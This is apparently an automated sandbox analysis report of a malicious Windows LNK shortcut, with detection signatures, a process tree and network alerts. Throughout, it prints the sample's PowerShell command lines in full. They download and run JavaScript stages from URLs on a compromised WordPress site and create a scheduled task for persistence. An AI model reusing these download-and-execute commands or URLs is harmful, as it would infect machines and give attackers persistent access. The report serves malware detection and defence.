
Windows Analysis Report
G9eWTvswoH.lnk

Overview

General Information

Sample name: G9eWTvswoH.lnk (renamed because the original name is a hash value)
Original sample name: 9ee3acebaae539dc60ea9321cfcf27451f6f05afc80ae7f7a959f76a8d587839.lnk
Analysis ID: 1567188
MD5: f7f1052c9d09d61490d8f116238af21e
SHA1: 0f2550bb03f31716232de245a02823885f529e09
SHA256: 9ee3acebaae539dc60ea9321cfcf27451f6f05afc80ae7f7a959f76a8d587839
Tags: lnk, www-italialife24-it, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7556 cmdline: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • wscript.exe (PID: 7608 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7812 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 7828 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 5344 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5644 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 7452 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 5740 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Source: Process Memory Space: powershell.exe PID: 7332 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7332 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings: $b3 (::UTF8.GetString() matched at multiple memory offsets
Source: amsi64_7332.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security

      System Summary

      Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7332, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, ProcessId: 7556, ProcessName: schtasks.exe
      Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, ProcessId: 7608, ProcessName: wscript.exe
      Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7332, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, ProcessId: 7556, ProcessName: schtasks.exe
      Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js ", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7608, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js ", ProcessId: 7668, ProcessName: powershell.exe
      Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, ProcessId: 7608, ProcessName: wscript.exe
      Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, ProcessId: 7608, ProcessName: wscript.exe
      Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7332, TargetFilename: C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js
      Source: Process started | Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, ProcessId: 7332, ProcessName: powershell.exe
      Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, ProcessId: 7332, ProcessName: powershell.exe
      Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7332, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, ProcessId: 7556, ProcessName: schtasks.exe
      Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, ProcessId: 7332, ProcessName: powershell.exe
      Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, ProcessId: 7608, ProcessName: wscript.exe
      Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, ProcessId: 7332, ProcessName: powershell.exe
      Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol)
      Timestamp: 2024-12-03T09:14:04.951516+0100 | SID: 2803305 | Severity: 3 | Classtype: Unknown Traffic | Source IP: 192.168.2.4 | Source Port: 49731 | Destination IP: 46.254.34.201 | Destination Port: 443 | Protocol: TCP

      AV Detection

      Source: G9eWTvswoH.lnk | ReversingLabs: Detection: 45%
      Source: G9eWTvswoH.lnk | Virustotal: Detection: 45%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.0% probability
      Source: G9eWTvswoH.lnk | Joe Sandbox ML: detected
      Source: unknown | HTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49751 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49887 version: TLS 1.2

      Software Vulnerabilities

      Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global traffic | HTTP traffic detected:
        GET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1
        Host: www.italialife24.it
